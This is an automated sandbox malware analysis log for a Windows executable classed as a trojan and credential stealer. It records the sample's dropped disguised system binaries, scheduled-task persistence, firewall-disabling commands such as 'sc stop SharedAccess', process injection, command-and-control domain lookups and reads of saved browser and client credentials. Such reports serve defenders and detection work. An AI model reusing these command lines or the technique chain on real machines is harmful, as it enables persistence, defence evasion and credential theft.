                Source: Lg3gn9y1Cj.exe, 00000000.00000003.269756688.00000000007A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoral.exe vs Lg3gn9y1Cj.exe
                Source: Lg3gn9y1Cj.exeBinary or memory string: OriginalFilenameWin.exe vs Lg3gn9y1Cj.exe
                Source: Lg3gn9y1Cj.exeBinary or memory string: OriginalFilenamesoral.exe vs Lg3gn9y1Cj.exe
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\spoolsv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                Source: C:\Windows\System\spoolsv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\System\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Windows\System\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\AppData\Local\icsys.icn.exeJump to behavior
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@144/20@13/5
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: lg3gn9y1cj.exe , 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: \gA*\AC:\Users\TTDOCKYARD\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                Source: Lg3gn9y1Cj.exe, 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000004.00000002.284335870.000000000042C000.00000004.00000001.01000000.0000000A.sdmp, spoolsv.exe, 00000007.00000002.281046560.000000000042C000.00000004.00000001.01000000.0000000C.sdmp, spoolsv.exe, 00000009.00000002.280212029.000000000042C000.00000004.00000001.01000000.0000000C.sdmp, explorer.exe, 00000022.00000002.316774261.000000000042C000.00000004.00000001.01000000.0000000B.sdmp, svchost.exe, 00000034.00000002.341661053.000000000042C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: f`P@*\AD:\Code\Explorer\Explorer.vbp
                Source: Lg3gn9y1Cj.exe, icsys.icn.exe.0.dr, svchost.exe.7.dr, spoolsv.exe.5.dr, mrsys.exe.5.dr, explorer.exe.4.dr, stsys.exe.8.drBinary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
                Source: explorer.exe, 00000005.00000002.529162179.000000000042C000.00000004.00000001.01000000.0000000B.sdmp, svchost.exe, 00000008.00000002.528806074.000000000042C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp
                Source: lg3gn9y1cj.exe , 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, lg3gn9y1cj.exe , 00000001.00000000.260922909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Lg3gn9y1Cj.exe, lg3gn9y1cj.exe .0.drBinary or memory string: A*\AC:\Users\TTDOCKYARD\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp<aA
                Source: lg3gn9y1cj.exe Binary or memory string: A*\AC:\Users\TTDOCKYARD\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
                Source: Lg3gn9y1Cj.exeVirustotal: Detection: 87%
                Source: Lg3gn9y1Cj.exeReversingLabs: Detection: 100%
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile read: C:\Users\user\Desktop\Lg3gn9y1Cj.exeJump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Lg3gn9y1Cj.exe "C:\Users\user\Desktop\Lg3gn9y1Cj.exe"
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\Desktop\lg3gn9y1cj.exe c:\users\user\desktop\lg3gn9y1cj.exe
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
                Source: C:\Windows\System\explorer.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
                Source: C:\Windows\System\spoolsv.exeProcess created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System\explorer.exe "C:\windows\system\explorer.exe" RO
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System\svchost.exe "C:\windows\system\svchost.exe" RO
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
                Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\Desktop\lg3gn9y1cj.exe c:\users\user\desktop\lg3gn9y1cj.exe Jump to behavior
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeProcess created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exeJump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exeJump to behavior
                Source: C:\Windows\System\explorer.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SEJump to behavior
                Source: C:\Windows\System\spoolsv.exeProcess created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PRJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccessJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= autoJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvcJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\~DF01383C41703FF854.TMPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4316:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:240:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe
                Source: unknownProcess created: C:\Windows\System\explorer.exe
                Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exeJump to behavior
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, Linq4you/FileZilla.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, Linq4you/SystemInfo.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, ThunderFox/MozillaTFOXPBE.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, Linq4you/FileZilla.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, Linq4you/SystemInfo.csCryptographic APIs: 'CreateDecryptor'
                Source: 2.0.AppLaunch.exe.5320000.0.unpack, ThunderFox/MozillaTFOXPBE.csCryptographic APIs: 'TransformFinalBlock'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdb source: lg3gn9y1cj.exe , lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20220805_070938_705.etl.45.dr
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdbDO source: lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: 1_2_0040B64D push cs; ret 1_2_0040B6F9
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Code function: 1_2_0040AE9E push ds; ret 1_2_0040B5EB
                Source: Lg3gn9y1Cj.exeStatic PE information: section name: .tdata
                Source: icsys.icn.exe.0.drStatic PE information: section name: .tdata
                Source: explorer.exe.4.drStatic PE information: section name: .tdata
                Source: spoolsv.exe.5.drStatic PE information: section name: .tdata
                Source: mrsys.exe.5.drStatic PE information: section name: .tdata
                Source: svchost.exe.7.drStatic PE information: section name: .tdata
                Source: stsys.exe.8.drStatic PE information: section name: .tdata

                Persistence and Installation Behavior

                Source: C:\Windows\System\svchost.exeExecutable created and started: c:\windows\system\spoolsv.exeJump to behavior
                Source: C:\Users\user\AppData\Local\icsys.icn.exeExecutable created and started: c:\windows\system\explorer.exeJump to behavior
                Source: C:\Windows\System\spoolsv.exeExecutable created and started: c:\windows\system\svchost.exeJump to behavior
                Source: C:\Windows\System\spoolsv.exeFile created: C:\Windows\System\svchost.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: C:\Windows\System\explorer.exeJump to dropped file
                Source: C:\Windows\System\explorer.exeFile created: C:\Windows\System\spoolsv.exeJump to dropped file
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeFile created: C:\Users\user\Desktop\lg3gn9y1cj.exe Jump to dropped file
                Source: C:\Windows\System\explorer.exe File created: C:\Users\user\AppData\Roaming\mrsys.exe
                Source: C:\Windows\System\svchost.exe File created: C:\Users\user\AppData\Local\stsys.exe
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe File created: C:\Users\user\AppData\Local\icsys.icn.exe

                Boot Survival

                Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                Source: C:\Windows\System\explorer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPath
                Source: C:\Windows\System\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess
                Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\icsys.icn.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System\explorer.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System\spoolsv.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System\svchost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe TID: 916 Thread sleep count: 33 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5140 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1404 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System\explorer.exe TID: 5244 Thread sleep count: 359 > 30
                Source: C:\Windows\System\svchost.exe TID: 784 Thread sleep count: 66 > 30
                Source: C:\Windows\System32\svchost.exe TID: 4216 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System\explorer.exe Window / User API: threadDelayed 359
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe API coverage: 3.2 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                Source: C:\Windows\System\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exe
                Source: C:\Windows\System\svchost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                Source: svchost.exe, 00000027.00000002.537976090.000001E1CF665000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAW
                Source: svchost.exe, 0000000E.00000002.529653388.0000024224802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: svchost.exe, 00000027.00000002.532624727.000001E1CA029000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.537883758.000001E1CF658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 0000000E.00000002.531319269.0000024224840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.532432595.0000018D6C440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.532026229.0000018338C29000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\icsys.icn.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\System\explorer.exe Domain query: vccmd01.googlecode.com
                Source: C:\Windows\System\explorer.exe Domain query: vccmd02.googlecode.com
                Source: C:\Windows\System\explorer.exe Network Connect: 51.81.194.202 443
                Source: C:\Windows\System\explorer.exe Domain query: zxq.net
                Source: C:\Windows\System\explorer.exe Domain query: vccmd01.zxq.net
                Source: C:\Windows\System\explorer.exe Domain query: vccmd03.googlecode.com
                Source: C:\Windows\System\explorer.exe Domain query: vccmd01.t35.com
                Source: C:\Windows\System\explorer.exe Network Connect: 142.250.145.82 80
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 5320000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 5320000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 5320000
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 503F008
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exe Code function: 0_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow,0_2_0041E9D0

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                Source: svchost.exe, 0000002E.00000002.532484937.000001B3C3F02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Source: Yara match File source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5840, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                Source: Yara match File source: 00000002.00000002.277724010.000000000733B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.277673083.00000000072F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match File source: Process Memory Space: lg3gn9y1cj.exe PID: 4392, type: MEMORYSTR
                Source: Yara match File source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5840, type: MEMORYSTR

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | 131 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 Account Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
